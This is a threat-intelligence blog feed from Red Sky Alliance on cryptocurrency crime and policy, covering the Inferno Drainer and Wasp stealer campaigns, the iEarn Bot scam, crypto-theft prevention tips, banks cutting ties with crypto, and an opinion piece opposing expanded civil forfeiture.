crypto - X-Industry - Red Sky Alliance (feed, 2024-03-28T10:37:40Z) https://redskyalliance.org/xindustry/feed/tag/crypto
<p><strong>Where did my Crypto Go?</strong> https://redskyalliance.org/xindustry/where-did-my-crypto-go, 2024-01-23, by Jim McKee (https://redskyalliance.org/members/JimMcKee)</p>
<div><p>The operators behind the now-defunct <u>Inferno Drainer</u> created more than 16,000 unique malicious domains over a span of one year between 2022 and 2023. The scheme used high-quality phishing pages to lure unsuspecting users into connecting their cryptocurrency wallets to attacker-controlled infrastructure that spoofed Web3 protocols, tricking victims into authorizing transactions. A crypto drainer is a malicious tool or script designed to transfer or redirect cryptocurrency from a victim’s wallet to one under the attacker's control. Drainers targeting MetaMask first appeared around 2021 and were openly marketed in underground forums and marketplaces.</p>
<p>Inferno Drainer, active from November 2022 to November 2023, is estimated to have reaped over $87 million in illicit profits by scamming more than 137,000 victims. The malware is part of a broader set of similar offerings available to affiliates under the Scam-as-a-Service (or Drainer-as-a-Service) model in exchange for a 20% cut of their earnings.<a href="#_ftn1">[1]</a></p>
<p>See: <a href="https://redskyalliance.org/xindustry/scam-as-a-service-now-available">https://redskyalliance.org/xindustry/scam-as-a-service-now-available</a></p>
<p>Customers of Inferno Drainer could either upload the malware to their own phishing sites or use the developer's service for creating and hosting phishing websites, either at no extra cost or charging 30% of the stolen assets in some cases. According to investigators, the activity spoofed over 100 cryptocurrency brands via specially crafted pages hosted on over 16,000 unique domains.</p>
<p>An analysis of 500 of these domains revealed that the JavaScript-based drainer was initially hosted on a GitHub repository (kuzdaz.github[.]io/seaport/seaport.js) before being embedded directly in the websites. The user "kuzdaz" no longer exists. Similarly, another set of 350 sites included a JavaScript file, "coinbase-wallet-sdk.js," hosted on a different GitHub repository, "kasrlorcian.github[.]io." Links to these sites were then spread on platforms like Discord and X (formerly Twitter), enticing potential victims to click them under the guise of free tokens (aka airdrops) and to connect their wallets, at which point their assets were drained once the transactions were approved.</p>
<p>Using the names seaport.js, coinbase.js, and wallet-connect.js, the idea was to masquerade as popular Web3 protocols like Seaport, WalletConnect, and Coinbase to complete the unauthorized transactions. The earliest website containing one of these scripts dates back to 15 May 2023. Another typical feature of phishing websites belonging to Inferno Drainer is that users cannot open website source code by using hotkeys or right-clicking on the mouse. This means that the criminals attempted to hide their scripts and illegal activity from their victims.</p>
<p>The Google-owned Mandiant's X account was compromised earlier this month to distribute links to a phishing page hosting a cryptocurrency drainer tracked as CLINKSINK. “We believe that the ‘X as a service’ model will continue to thrive, not least because it creates greater opportunities for less technically competent individuals from trying their hand at becoming cybercriminals, and for developers, it is a highly profitable way to bolster their revenues,” the company reported. “We also expect to see increased attempts at hacking official accounts, as posts purportedly authored by an authoritative voice are likely to inspire trust in the eyes of viewers and may make potential victims more likely to follow links and connect their accounts.”</p>
<p>The success of Inferno Drainer could fuel the development of new drainers and lead to a surge in websites containing malicious scripts that spoof Web3 protocols; researchers warn that 2024 could become the “year of the drainer.” Inferno Drainer may have ceased its activity, but its prominence throughout 2023 highlights the severe risks to cryptocurrency holders as drainers continue to develop.</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. Call for assistance. For questions, comments, a demo, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com </p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></p>
<p>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p><strong>Weekly Cyber Intelligence Briefings:</strong></p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://thehackernews.com/2024/01/inferno-malware-masqueraded-as-coinbase.html">https://thehackernews.com/2024/01/inferno-malware-masqueraded-as-coinbase.html</a></p></div>
<p><strong>iEarn Bot is a Scam</strong> https://redskyalliance.org/xindustry/batloader-not-from-gotham-city, 2023-03-30, by Jim McKee (https://redskyalliance.org/members/JimMcKee)</p>
<div><p>According to various investigating agencies, thousands of people are believed to have lost their savings after investing in a cryptocurrency trading app called iEarn Bot (https://www.iearnbot.com). DO NOT VISIT THIS WEBSITE; IT IS A SCAM. Experts investigating the company say it could be one of the largest crypto scandals. Cryptocurrency trading has become popular, with promoters often promising large rewards over short periods. But law enforcement agencies warn of many scams and recommend investors conduct "due diligence."<a href="#_ftn1">[1]</a></p>
<p>Roxana, not her real name, is from Romania. She says she lost hundreds of euros when she invested in iEarn Bot. She asked not to have her identity revealed as she fears her professional reputation might be damaged. Customers like Roxana who bought bots were told their investment would be handled by the company's artificial intelligence program, guaranteeing high returns. "I invested in a bot for one month," Roxana tells the BBC. "You could see in the app how many dollars the app was creating: graphics showed how the investment was progressing. It looked quite professional until, at some point, they announced maintenance." At that point, withdrawals from the app were frozen for some time. "Some people started to say 'I cannot withdraw... what is happening'," explains Roxana. "I made the request to withdraw, and the money just disappeared. The portfolio became zero, but I was never credited to my wallet with any money."</p>
<p>In Romania, dozens of high-profile figures, including government officials and academics, were persuaded to invest via the app because Gabriel Garais, a leading IT expert in the country, sponsored it. Mr. Garais says he was also fooled into investing his savings in the app and lost his money. Roxana insists that had it not been for Garais's sponsorship, she would have never considered investing. "We had the knowledge to think this might be a scam," she says, "but the fact that in between the company and us, there was a reputable teacher meant that we didn't check too much or doubt too much."</p>
<p>What happened in Romania is not an isolated incident. Nor is it unique to Romania.</p>
<p>When Silvia Tabusca, a Romanian organized crime expert from the European Center for Legal Education and Research, began looking into iEarn Bot, she discovered that many people in other countries had also lost their money in the scheme. What surprised her most was the scale of the operation. "From what we have seen, the number of investors is quite high," she says. "In Indonesia, for example, they [iEarn Bot] claim they had 800,000 customers. At first, the app works very well," says Ms. Tabusca. "When they have enough investors and enough money invested in a specific country, they don't allow that country to withdraw anymore - and they open other countries."</p>
<p>iEarn Bot presents itself as a US-based company with excellent credentials, but when the BBC fact-checked some information on its website, it raised several red flags. The man the site names as the company's founder told the BBC he had never heard of them and said he has made a complaint to the police. The Massachusetts Institute of Technology (MIT), alongside companies such as Huawei and Qualcomm, are all named as "strategic partners" of iEarn Bot. They also said they have no knowledge of the company and are not working with it.</p>
<p>On the website, the company does not provide any contact information. When the BBC checked the history of its Facebook page, we learned that until the end of 2021, the account was advertising weight-loss products. It is managed from Vietnam and Cambodia. iEarn Bot greatly emphasizes pushing investors to recruit more people to join the app. "The way people in this company operate is more similar to a Ponzi scheme than an actual business," says Ms. Tabusca.</p>
<p>The BBC has also seen chat conversations where people, who claim to be from iEarn Bot's customer service, told investors that to withdraw their money, they must pay a 30% fee. "Some people were quite desperate to get their money back, so they paid the fee, but they still couldn't withdraw," says Ms. Tabusca. The BBC has repeatedly approached iEarn Bot for comment, but it has not responded so far.</p>
<p>In some countries, such as Nigeria and Colombia, local leaders were pushed by iEarn Bot mentors, with whom they only ever communicated on Telegram, to organize recruiting events.</p>
<p>Andres, from Colombia, said he actively recruited people to join the app. He still believes the company is legitimate. "They had their registration in the US that showed they were legit," he says. "And they were paying." In his country, withdrawals were stopped in December. People were told the company was transforming investment in USDT, a well-established cryptocurrency, into a new coin called iBot, which had the same value. Investors were asked to be patient until March 2023, when the new coin was expected to be officially launched. But people are still waiting to access their money. "[People] took loans to invest. They used money from other sources, and many people were affected," says Andres. "As the local leaders did not have answers, people started to get angry."</p>
<p>With the help of an analyst, the BBC managed to identify one main crypto wallet that received payments from about 13,000 potential victims for a profit of almost $1.3m (£1m) in less than one year. But they could not track down where and to whom the money went. For investigators, this is a common issue. "One of the challenges is to identify and attribute who the illicit actor is, where the value is going, and then being able to take investigative steps and law enforcement action," says Patrick Wyman, chief of the FBI's new Virtual Assets Unit. Investigations in this sort of scheme, he says, go global quickly. Such investigations require international cooperation and may take longer, but he insists those responsible are eventually brought to justice.</p>
<p>The FBI set up the Virtual Assets Unit in 2022 to respond to growing crimes using virtual currencies. It invites people who have been victims of scams to complain on the FBI's dedicated page. But law enforcement agencies maintain the best way to fight scammers remains prevention. "Knowledge and doing some due diligence before the investment it's critical," says Mr. Wyman. "It's like everything else: if it sounds too good to be true, it often is."</p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.bbc.com/news/technology-64939146">https://www.bbc.com/news/technology-64939146</a></p></div>
<p><strong>Hacking Techniques to Steal Crypto</strong> https://redskyalliance.org/xindustry/hacking-techniques-to-steal-crypto, 2023-03-06, by Mac McKee (https://redskyalliance.org/members/MacMcKee)</p>
<div><p>For crypto investors who have not followed the news of thefts, exchange collapses and new government regulations, and who are prepared to lose their entire investment, here is some advice to follow. <a href="https://www.cnbc.com/2021/06/30/what-do-most-companies-think-when-hackers-demand-ransom-time-to-pay.html">Hackers demand payment in crypto</a>, run scams that lead directly to crypto theft, or target crypto trading companies. As an individual with funds in crypto, you are likely to encounter fraudulent investment schemes, fake giveaways, phishing attacks, and other mischief.</p>
<p>The “hook” of most investment scams is the promise of incredible financial gain if you send the person in question a certain amount in crypto. While most phishing attempts happen via email, there are also instances of SMS phishing. For example, the recent data breach that occurred <a href="https://www.coinbase.com/blog/social-engineering-a-coinbase-case-study">at the crypto trader Coinbase’s premises</a> started with SMS phishing.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/5-tricks-with-crypto-phishing">https://redskyalliance.org/xindustry/5-tricks-with-crypto-phishing</a></p>
<p>An employee received an SMS that urged them to click on a link and log in using their credentials. With that action, cybercriminals were given all the data they needed to gain illicit access to the company’s systems.</p>
<p>Individuals looking to avoid scams and subsequent crypto theft should:</p>
<ul>
<li>Avoid crypto giveaways; do not open or view them</li>
<li><a href="https://www.finance-monthly.com/2018/06/authentication-is-imperfect-but-passwords-are-not-out/">Update passwords regularly</a> and use two-factor authentication</li>
<li>Do not link traditional bank and crypto accounts</li>
<li>Know the signs of scam messages: time pressure and big promises that sound too good to be true, because they are</li>
<li>Avoid clicking any link that leads to a login page</li>
<li>Never disclose your key, even if the request appears to come from the legitimate trader</li>
</ul>
<p>The majority of cybercrime is financially motivated, and it is common for criminals to demand payment in crypto (which is more difficult to trace) during ransom and extortion attempts. For example, it was recently reported that an Australian citizen attempted to extort an unnamed emergency service for $5 million worth of crypto by threatening to start a bushfire. <a href="https://www.theage.com.au/national/victoria/melbourne-man-accused-of-demanding-crypto-in-bushfire-threat-20230228-p5co2d.html">The service did not meet his demands</a>, and the man was charged as a result.</p>
<p>Ransomware cases (in which cybercriminals lock documents and demand a ransom in crypto in exchange for restoring access to the files) are increasing and put affected users and businesses in a difficult position. Many businesses have paid a ransom to regain access to important files.</p>
<p>While in many countries it is not illegal to pay hackers who demand a ransom, in the USA the government discourages paying any ransom, regardless of the damage to the victim organization. Making a payment can:</p>
<ul>
<li>Backfire once the public finds out that you have paid the ransom, damaging your reputation and, if PII was lost or disclosed, exposing you to litigation.</li>
<li>Fund further criminal activity: the criminals can do the same to someone else, or threaten you again if they left a backdoor on your servers.</li>
<li>Go wrong, since there is no guarantee that the hacker will restore your access to your systems.</li>
</ul>
<p>Any company with critical flaws that are not patched is open to exploitation. Zero-day threats are on the increase too. For example, a Trojan dubbed Parallax RAT was discovered recently; its operators' main targets are cryptocurrency firms. Like any other Trojan, this malware hides inside ordinary-looking documents to sneak the “gift horse” onto targeted devices. It can record keystrokes and take screenshots, which means it can capture the username and password a victim types in, as well as the key used for the account.</p>
<p>Users do not have a lot of power when it comes to fighting such advanced attacks. Crypto trading companies are responsible for securing assets as well as protecting their clients.</p>
<p>Be careful when you choose a crypto company. Check if they are reputable and whether they have already experienced major cybersecurity incidents in the past. Pay attention to how they resolved the issue and communicated with the public about the data breach. Advanced black hat (illegal) hackers and hacking groups typically go after companies that already have strong security, multiple solutions, and teams to manage it. But can they handle more sophisticated techniques such as Parallax RAT?</p>
<p>How businesses can defend against cyberattacks:</p>
<ul>
<li>Setting up layered security</li>
<li>Testing the existing security solutions</li>
<li>Strengthening the security daily</li>
<li>Education and training for all employees</li>
</ul>
<p>A data breach that compromises crypto wallets can be prevented if the company has multiple security controls and protocols that cover the complete attack surface (any software and device that could be attacked). Besides setting up a strong defense strategy, it is vital to continually improve it with <a href="https://cymulate.com/breach-and-attack-simulation">tools such as automated breach and attack simulation</a> that test an organization's security in real time.</p>
<p>Today, cryptocurrency firms are up against more damaging and dangerous threats than ever before, from new versions of viruses that can get into a system undetected to persistent phishing attacks. The method on which hackers rely the most is social engineering. Phishing is also the technique that individual users can do the most about.</p>
<p>On a personal level, learning how to recognize scam emails, avoiding links designed to collect your sensitive data, and choosing a trusted crypto entity can save you a lot of money in the long run.</p>
<p>TR-23-66-001.pdf</p></div>
<p><strong>US Banks Are Breaking Up with Crypto</strong> https://redskyalliance.org/xindustry/us-banks-are-breaking-up-with-crypto, 2023-02-20, by Jim McKee (https://redskyalliance.org/members/JimMcKee)</p>
<div><p>US banks are backing away from crypto companies, concerned by a regulatory crackdown that threatens to sever digital currencies from the real-world financial system. Banking regulators are raising concerns about banks’ involvement with crypto clients following last year’s blowup of Sam Bankman-Fried’s FTX. The Securities and Exchange Commission is aggressively pursuing the industry’s bigger players in a crackdown that threatens to narrow their reach. That move has alarmed bankers who don’t want to do business with customers in the SEC’s crosshairs, people familiar with the matter said.<a href="#_ftn1">[1]</a></p>
<p>According to people familiar with the industry, bankers are now re-evaluating any exposure to the crypto sector, no matter how small. The few smaller banks that got deep into crypto are reducing their exposure to the market or cutting ties altogether. Banks that kept their distance from crypto are trying even harder to stay away, closing accounts and shunning customers with potential connections to the industry.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/what-is-the-future-of-cryptocurrency">https://redskyalliance.org/xindustry/what-is-the-future-of-cryptocurrency</a></p>
<p>New York’s Metropolitan Commercial Bank recently announced it was closing its crypto business, citing material changes in the regulatory environment. Signature Bank cut ties with the international business of Binance, the biggest crypto exchange. Signature, one of crypto’s leading banks, had started paring back its relationships with crypto depositors late last year.</p>
<p>The crackdown is squeezing crypto businesses. While the industry often pitched itself as an alternative to banks, these firms still rely heavily on banks to link up with a financial system that runs on hard currencies such as dollars and euros. Without banks, crypto companies struggle to pay their employees and enable customers to move money in and out of digital currencies.</p>
<p>When bitcoin first gained popularity years ago, it was difficult for crypto firms to open bank accounts. A handful of smaller lenders, struggling to compete with big banks for deposit dollars, opened their doors, often banking only the bigger crypto players they thought were safest. These banks don’t hold digital currencies. Instead, they provide corporate accounts for crypto companies. Some, such as Silvergate Capital Corp., also built special networks to enable transfers between big investors and crypto exchanges.</p>
<p>For a time, banking regulators warmed to crypto activities. In 2020, the Office of the Comptroller of the Currency said it would allow banks to hold cryptocurrencies for customers. Regulators reversed course following the FTX meltdown. In January, the three major banking regulators warned banks that they were concerned about their crypto ties. The regulators said they had “significant safety and soundness concerns” and questioned if the industry could be safely banked.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/sec-chairman-pushes-for-more-cryptocurrency-regulations">https://redskyalliance.org/xindustry/sec-chairman-pushes-for-more-cryptocurrency-regulations</a></p>
<p>“That was a red flare that basically says, ‘Banks, if you’re going to be anywhere near the crypto business, we’re going to be looking at you very carefully,’” said Thomas Vartanian, executive director of the Financial Technology and Cybersecurity Center. “At the end of the day, banks will have to ask themselves if it’s worth the aggravation.”</p>
<p>Regulators generally do not tell banks that they cannot do business with customers operating legitimate businesses. Instead, they categorize customers as higher risk through formal public statements reinforced by feedback from the examiners who burrow into their operations to ensure they are not taking undue risks. Banks often then decide these customers aren’t worth the regulatory headache and cut them off.</p>
<p>Citigroup Inc. abruptly closed Swan Bitcoin’s account in November 2022, said Cory Klippsten, chief executive of the bitcoin trading platform, forcing him to scramble to pay his 100 employees. He said that Citigroup investment bankers who had been pitching to work with him tried to intervene but were unsuccessful. Soon afterward, Mr. Klippsten said, his personal accounts at Citigroup were closed, too. He said he was never given an explanation.</p>
<p>Matthew Homer, a former regulator now advising and investing in crypto firms, said his clients are having difficulty landing bank accounts. A First Republic representative told Mr. Homer the bank avoids crypto-related companies. Mercury, a banking service for startups, asks if a business is related to crypto in the sign-up process, Mr. Homer said. A spokesman for Mercury said it conducts more due diligence on these businesses because of regulatory uncertainty. A representative for First Republic declined to comment.</p>
<p>Signature is the highest-profile bank to retreat from the crypto market. In early 2022, 27% of its $109 billion deposits were from its digital-asset clients. Last year, the bank announced plans to pare back the share of deposits from the crypto business to less than 15% and to cap the number of deposits from any individual crypto customer. Regulators didn’t tell them to back away, but the bank felt they “agreed with what we were doing,” Chief Executive Joe DePaolo said. Bank officers said they don’t regret getting into crypto, even if they now spend much time reassuring their customers in other industries about their exposure. They believe the blockchain technology behind the payments network popular with crypto customers is relevant to companies such as payroll providers and cargo shippers.</p>
<p>Some banks, meanwhile, are sticking with crypto. Silvergate went all-in on crypto and does not have the same revenue sources as Signature. It lost the bulk of its crypto deposits in a run on the bank last quarter and is cutting jobs and shrinking its business to lower costs. Silvergate said it remains committed to serving crypto companies.</p>
<p>Two companies trying to win banking licenses have been left in limbo after winning preliminary approval in early 2021 from the OCC. Paxos National Trust and Protego Trust Co. applied to start banks that would hold crypto assets for clients and facilitate trading. Protego’s conditional charter expired recently. Paxos said on Twitter that it continues to “work constructively with the OCC.” </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.wsj.com/articles/banks-are-breaking-up-with-crypto-during-regulatory-crackdown-22de1832">https://www.wsj.com/articles/banks-are-breaking-up-with-crypto-during-regulatory-crackdown-22de1832</a></p></div>
<p><strong>'Wasp' Stealer Delivers a Stinging Message</strong> https://redskyalliance.org/xindustry/wasp-stealer-delivers-a-stinging-message, 2022-11-22, by Mac McKee (https://redskyalliance.org/members/MacMcKee)</p>
<div><p>Security researchers are warning about an ongoing supply chain attack that uses malicious Python packages to distribute an information stealer. The attackers have been active since October 2022. The <a href="https://blog.phylum.io/phylum-discovers-dozens-more-pypi-packages-attempting-to-deliver-w4sp-stealer-in-ongoing-supply-chain-attack">attack was uncovered</a> by investigators on 01 November 2022, with the attackers copying existing popular libraries and injecting a malicious ‘import’ statement into them. The purpose of the injected code is to infect the victim’s machine with a script that runs in the background. The script, which fetches the victim’s geolocation, contains a modified version of an information stealer called Wasp.</p>
<p>The attackers have managed to infect hundreds of victims to date, while actively releasing new packages to continue the campaign. Steganography is used to hide the malicious code inside packages. The payload is polymorphic, meaning that different code results each time the second and third stage URLs are loaded, which helps evade detection and ensures persistence.</p>
<p>Steganography is the practice of representing information within another message or physical object, in such a manner that the presence of the information is not evident to human inspection. In computing/electronic contexts, a <a href="https://en.wikipedia.org/wiki/Computer_file">computer file</a>, message, image, or video is concealed within another file, message, image, or video.</p>
<p><a href="https://medium.com/checkmarx-security/wasp-attack-on-python-polymorphic-malware-shipping-wasp-stealer-infecting-hundreds-of-victims-10e92439d192">The Wasp malware can steal</a> a great deal of information from victims’ machines, including all of the victim’s Discord accounts, passwords, credit card data, crypto wallets, and other files of interest on the victim’s PC. It sends the stolen data back to the attacker through a hard-coded Discord webhook address. WASP’s operators claim that it is fully undetectable.</p>
<p>The threat actor behind these attacks is offering their malware on cybercrime forums, claiming the code is fully undetected. Researchers were able to link Wasp’s author to a Steam account and to a YouTube channel containing videos on building Discord hacking tools. Since the beginning of the campaign, the attacker has created tens of new Python packages and numerous fake user accounts that mimic legitimate libraries and accounts.</p>
<p>The level of manipulation used by software supply chain attackers is increasing as attackers gain experience. This attack appears to be ongoing: whenever PyPI’s security team deletes the attacker’s packages, the attacker quickly maneuvers and creates a new identity or simply uses a different package name.</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a><br />Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a><br />LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p><br /> <strong>Weekly Cyber Intelligence Briefings</strong>:</p>
<p><br /> REDSHORTS - Weekly Cyber Intelligence Briefings<br /> <a href="https://attendee.gotowebinar.com/register/3702558539639477516">https://attendee.gotowebinar.com/register/3702558539639477516</a></p>
<p><a href="{{#staticFileLink}}10889538863,original{{/staticFileLink}}">TR-22-326-001.pdf</a></p>
<p><span style="font-size:8pt;"><a href="https://www.securityweek.com/hundreds-infected-wasp-stealer-ongoing-supply-chain-attack">https://www.securityweek.com/hundreds-infected-wasp-stealer-ongoing-supply-chain-attack</a></span></p>
</div>Biden Administration Wants to Ignore the 4th Amendment of the US Constitutionhttps://redskyalliance.org/xindustry/biden-administration-wants-to-ignore-the-4th-amendment-of-the-us-2022-10-31T21:19:29.000Z2022-10-31T21:19:29.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><a href="{{#staticFileLink}}10859343060,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10859343060,RESIZE_400x{{/staticFileLink}}" width="275" alt="10859343060?profile=RESIZE_400x" /></a>Buried deep in a recent 61-page <a href="https://www.justice.gov/ag/page/file/1535236/download">report</a> by the U.S. Attorney General, researchers found that the Biden Administration called for a dramatic expansion in the federal government’s ability to seize and keep cryptocurrency. If enacted, the proposed changes would bolster both criminal forfeiture, which requires a conviction to permanently confiscate property, and civil forfeiture, which does not require a conviction or even criminal charges to be filed. Notably, the report’s release was coupled with the <a href="https://www.justice.gov/opa/pr/justice-department-announces-report-digital-assets-and-launches-nationwide-network">announcement</a> of a new Digital Asset Coordinator Network. This nationwide network is staffed with more than 150 federal prosecutors who will be trained on “drafting civil and criminal forfeiture actions.”</p>
<p>The 4<sup>th</sup> Amendment to the US Constitution: </p>
<p>“The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things.”</p>
<p>Due to crypto’s pseudonymous nature, it is sometimes assumed to be immune from government confiscation. But the reality is quite different. During 2021, the U.S. Marshals, the custodians for Justice Department seizures, <a href="https://oig.justice.gov/reports/audit-united-states-marshals-services-management-seized-cryptocurrency">managed</a> almost 200 cryptocurrency seizures worth $466 million. Since fiscal 2014, the FBI, Secret Service, and Homeland Security Investigations have collectively <a href="https://www.justice.gov/ag/page/file/1535236/download">seized</a> almost $680 million worth of crypto (valued at the time of seizure), with hundreds of still active investigations involving digital assets. But even those amounts pale in comparison to IRS Criminal Investigation, which has <a href="https://www.hassan.senate.gov/imo/media/doc/crypto.pdf">confiscated</a> a staggering $3.8 billion in virtual currency between fiscal 2018 and 2021.</p>
<p>The Justice Department argued that crypto has “revealed limits on the forfeiture tools used” by federal law enforcement and recommended “several updates to existing law.” First, the Attorney General wants to broaden the most abusive form of civil forfeiture, which occurs without any independent or impartial judicial oversight.</p>
<p>Under “administrative” or “nonjudicial” forfeiture, the seizing agency, not a judge, decides whether property should be forfeited. The federal government can use administrative forfeiture to take almost anything, aside from real estate and property valued at more than $500,000. That $500,000 limit currently applies to cryptocurrency, but the Attorney General wants to “lift the $500,000 cap for cryptocurrency and other digital assets.” This would eliminate one of the very few limits on administrative forfeiture. Even if Congress refuses to act, thanks to a law enacted last year, the Secretary of the Treasury could simply end the cap by adopting a new regulation.</p>
<p>This proposal is deeply concerning. Administrative forfeiture provides shockingly scant protection for property owners. After seizing property, the government need only send notice of an administrative forfeiture. If an owner fails to quickly file a claim for their own property, it is automatically forfeited.</p>
<p>Since the seized property may be the owner’s most valuable asset, owners often do not have the means to fight back. Yet even when a claim is filed, the owner still might not get their day in court. According to a <a href="https://ij.org/report/policing-for-profit-3/">report</a> by the Institute for Justice, federal agencies have rejected more than one-third of all filed claims for seized cash as “deficient,” with most claims denied due to “technical reasons.” Unsurprisingly, since administrative forfeiture cases are significantly easier for the government to win, administrative forfeitures accounted for almost 80% of all forfeitures conducted by the Department of Justice and 96% of the Treasury Department’s forfeiture activity.</p>
<p>The Justice Department praises administrative forfeiture for being “efficient” and for reducing “undue burdens” in the court system; in reality, administrative forfeiture has burdened the lives of thousands of victims who have done nothing wrong.</p>
<p>Here is an example of an average forfeiture: <a href="https://ij.org/case/structuring-petition/">Ken Quran</a> came to America from the Middle East and opened a small convenience store in Greenville, North Carolina. But in June 2014, IRS agents barged into his store and told Ken they had a warrant to seize $570,000 and had already seized every penny in his bank account, $153,907.99. That money was Ken’s entire life savings, earned over nearly 20 years of long hours running his business. Less than three months later, Ken’s bank account was administratively forfeited. Without those savings, Ken was driven to the financial breaking point. He struggled to support his family, pay off his mortgage, and cover a line of credit he had to take out to keep his store afloat. Ken was never charged with a crime.</p>
<p>“I never believed this could happen in America,” Ken lamented. “I do not understand how, in this country, the government can take an honest businessman’s entire bank account without proving that he did something wrong.”</p>
<p>Fortunately, with help from the Institute for Justice, Ken later <a href="https://ij.org/wp-content/uploads/2015/07/irs-forfeiture-petitions-ken-quran-petition.pdf">filed</a> a “petition for remission or mitigation” (basically a pardon for forfeited property). After a media firestorm, in February 2016, the IRS agreed to return all of the money they had wrongfully taken from Ken. Although he lost fiat currency rather than crypto, as Ken’s story shows, there is absolutely no need to make administrative forfeiture easier to use.</p>
<p>In addition to expanding administrative forfeiture for crypto, the Justice Department “would welcome amendments to provide criminal and civil forfeiture authority for commodities-related violations.” Allowing criminal forfeiture after a conviction for fraud or manipulation in crypto markets would be a valuable tool to crack down on scammers.</p>
<p>Currently, most cryptocurrencies are <a href="https://www.washingtonpost.com/business/why-the-crypto-world-flinches-when-the-sec-calls-coins-securities/2022/09/22/cd4118fc-3a2b-11ed-b8af-0a04e5dc3db6_story.html">considered</a> commodities rather than securities. So under federal laws governing commodities, prosecutors can “charge fraud and manipulation in the cryptocurrency markets.” But unlike securities, those statutes “do not permit forfeiture of ill-gotten gains from criminal activity involving commodities.”</p>
<p>But extending <em>civil</em> forfeiture casts far too wide a net and would make it much more likely for innocent holders to lose their crypto to government confiscation. After all, civil forfeiture lacks a conviction requirement, unlike criminal forfeiture. Moreover, there is a direct financial incentive for federal agencies to pursue forfeiture cases: Once property has been forfeited (either civilly or criminally), the seizing federal agency can retain up to 100% of the proceeds.</p>
<p>The proposed expansions in asset forfeiture are part of a broader assault on cryptocurrency, including attacks on the financial privacy cryptocurrency can otherwise afford. The Treasury Department’s Financial Crimes Enforcement Network (FinCEN) is currently considering a <a href="https://www.reginfo.gov/public/do/eAgendaViewRule?pubId=202104&RIN=1506-AB41">rule</a> that would extend intrusive reporting requirements to custodial wallets (i.e., those managed by a third party), the same reporting requirements that led the IRS to seize Ken’s cash.</p>
<p>If adopted, the wallet’s host would have to send detailed reports to FinCEN for every transaction with an unhosted wallet over $10,000, including personal information like the names and physical addresses of both parties involved in the transaction. Since the blockchain is inherently public, a single report on a single transaction would effectively become a digital skeleton key, letting the federal government snoop on all of the wallet’s other transactions.</p>
<p>This is moving in precisely the wrong direction. No matter how the midterms shake out, Congress must reject the proposed crypto crackdown and rein in civil forfeiture.</p>
<p>Article here: <a href="{{#staticFileLink}}10859342886,original{{/staticFileLink}}">TR-22-304-001.pdf</a></p></div>Crypto Storage Optionshttps://redskyalliance.org/xindustry/crypto-storage-options2022-06-27T16:33:00.000Z2022-06-27T16:33:00.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><a href="{{#staticFileLink}}10599272298,original{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10599272298,RESIZE_400x{{/staticFileLink}}" width="250" alt="10599272298?profile=RESIZE_400x" /></a>Cryptocurrency storage is one of the most important things that investors should consider when joining the burgeoning digital asset market. Most people investing in this space have little to no knowledge of the existing options. Crypto exchanges currently hold the larger share of investors’ capital despite the associated risks, including hacking and regulatory pressures from oversight authorities. </p>
<p>There are two types of crypto wallets: custodial and non-custodial. The former is offered by centralized crypto service providers, while the latter requires no third-party intervention. Non-custodial wallets give crypto users access to their private keys, meaning that an investor is fully in control of their funds at any point in time. </p>
<p>What is the danger of storing crypto funds in a custodial wallet? This type of crypto storage retains a user’s private keys, hence limiting them from accessing their funds without the permission of the service provider. In the past, there have been several cases where crypto investors lost funds or value as a result of crypto exchanges being hacked or directives from authorities to freeze funds. </p>
<p>Some of the recent incidents include the Mt.Gox <a href="https://www.buybitcoinworldwide.com/mt-gox-hack/#:~:text=Gox%20took%20a%20devastating%20hit,the%20end%20of%20February%202014.">hack</a> in 2014 where 850,000 Bitcoins were siphoned from the exchange (roughly worth $460 million in 2014). Regulatory authorities have previously seized crypto assets through the help of centralized exchanges. Additionally, it has become quite easy for regulators to direct the freezing of crypto funds due to new compliance laws such as the 5AMLD and MiCA. </p>
<p>Similar to most tech innovations, the crypto ecosystem has evolved to feature a wide range of products; users now have the option of storing their assets with exchanges or non-custodial wallets. While centralized crypto custody still enjoys a comfortable lead, non-custodial wallets have begun going mainstream given their value proposition when it comes to the principle of decentralization. </p>
<p>Crypto users have several options they can leverage, which include hardware wallets such as Trezor and Ledger. These off-chain crypto storage solutions are designed as a hard disk (cold storage) that can only be accessed through a private key held by the owner. This means that no government institution can gain access to one’s crypto funds; however, they can be hacked should a malicious player obtain the login credentials. </p>
<p>The other alternative is a software wallet like Metamask; according to the latest <a href="https://consensys.net/blog/press-release/metamask-surpasses-10-million-maus-making-it-the-worlds-leading-non-custodial-crypto-wallet/">update</a> by ConsenSys, this wallet hosts over 10 million monthly active users (MAUs). That is a large share of the crypto market, given the recent increase in market share of Decentralized Finance (DeFi) innovations on Ethereum. Metamask’s current infrastructure is advanced for new entrants in the crypto market. </p>
